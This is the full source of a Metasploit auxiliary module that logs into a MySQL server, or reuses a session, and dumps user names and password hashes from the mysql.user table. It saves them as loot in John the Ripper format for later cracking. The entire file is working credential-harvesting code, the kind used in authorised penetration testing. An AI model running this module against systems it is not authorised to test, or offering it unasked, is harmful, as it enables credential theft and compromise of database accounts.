Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.

1
##
2
# This module requires Metasploit: https://metasploit.com/download
3
# Current source: https://github.com/rapid7/metasploit-framework
4
##
5

6
class MetasploitModule < Msf::Auxiliary
7
  include Msf::Exploit::Remote::MYSQL
8
  include Msf::Auxiliary::Report
9
  include Msf::Auxiliary::Scanner
10
  include Msf::OptionalSession::MySQL
11

12
  def initialize
13
    super(
14
      'Name'           => 'MYSQL Password Hashdump',
15
      'Description'    => %(
16
          This module extracts the usernames and encrypted password
17
        hashes from a MySQL server and stores them for later cracking.
18
      ),
19
      'Author'         => ['theLightCosine'],
20
      'License'        => MSF_LICENSE
21
    )
22
  end
23

24
  def run_host(ip)
25
    # If we have a session make use of it
26
    if session
27
      print_status("Using existing session #{session.sid}")
28
      self.mysql_conn = session.client
29
    else
30
      # otherwise fallback to attempting to login
31
      return unless mysql_login_datastore
32
    end
33

34
    service_data = {
35
      address: mysql_conn.peerhost,
36
      port: mysql_conn.peerport,
37
      service_name: 'mysql',
38
      protocol: 'tcp',
39
      workspace_id: myworkspace_id
40
    }
41

42
    credential_data = {
43
      module_fullname: self.fullname,
44
      origin_type: :service,
45
      private_data: datastore['PASSWORD'],
46
      private_type: :password,
47
      username: datastore['USERNAME']
48
    }
49

50
    credential_data.merge!(service_data)
51

52
    credential_core = create_credential(credential_data)
53

54
    login_data = {
55
      core: credential_core,
56
      last_attempted_at: DateTime.now,
57
      status: Metasploit::Model::Login::Status::SUCCESSFUL
58
    }
59
    login_data.merge!(service_data)
60

61
    create_credential_login(login_data)
62

63
    # Grab the username and password hashes and store them as loot
64
    version = mysql_get_variable("@@version")
65

66
    if version.nil?
67
      print_error("There was an error reading the version")
68
      return
69
    end
70

71
    # Starting from MySQL 5.7, the 'password' column was changed to 'authentication_string'.
72
    if version[0..2].to_f > 5.6
73
      res = mysql_query("SELECT user,authentication_string from mysql.user")
74
    else
75
      res = mysql_query("SELECT user,password from mysql.user")
76
    end
77

78
    if res.nil?
79
      print_error("There was an error reading the MySQL User Table")
80
      return
81
    end
82

83
    service_data = {
84
      address: ::Rex::Socket.getaddress(mysql_conn.peerhost, true),
85
      port: mysql_conn.peerport,
86
      service_name: 'mysql',
87
      protocol: 'tcp',
88
      workspace_id: myworkspace_id
89
    }
90

91
    credential_data = {
92
      origin_type: :service,
93
      jtr_format: 'mysql,mysql-sha1',
94
      module_fullname: self.fullname,
95
      private_type: :nonreplayable_hash
96
    }
97

98
    credential_data.merge!(service_data)
99

100
    if res.size > 0
101
      res.each do |row|
102
        credential_data[:username]     = row[0]
103
        credential_data[:private_data] = row[1]
104
        print_good("Saving HashString as Loot: #{row[0]}:#{row[1]}")
105
        credential_core = create_credential(credential_data)
106
        login_data = {
107
          core: credential_core,
108
          status: Metasploit::Model::Login::Status::UNTRIED
109
        }
110
        login_data.merge!(service_data)
111
        create_credential_login(login_data)
112
      end
113
    end
114
  end
115
end
116

117